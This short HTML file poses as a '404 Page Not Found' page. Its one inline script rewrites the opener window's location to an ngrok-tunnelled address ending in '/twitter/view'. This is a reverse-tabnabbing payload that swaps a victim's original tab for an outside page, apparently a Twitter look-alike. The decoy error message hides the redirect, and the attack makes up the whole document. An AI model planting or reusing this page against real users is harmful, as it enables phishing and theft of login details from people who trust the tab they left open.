<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title></title>
  </head>
  <body>
    <h1>404 Page Not Found</h1>
    <script type="text/javascript">
      window.opener.location =  ' https://ed3dd888.ngrok.io/twitter/view';
    </script>
  </body>
</html>
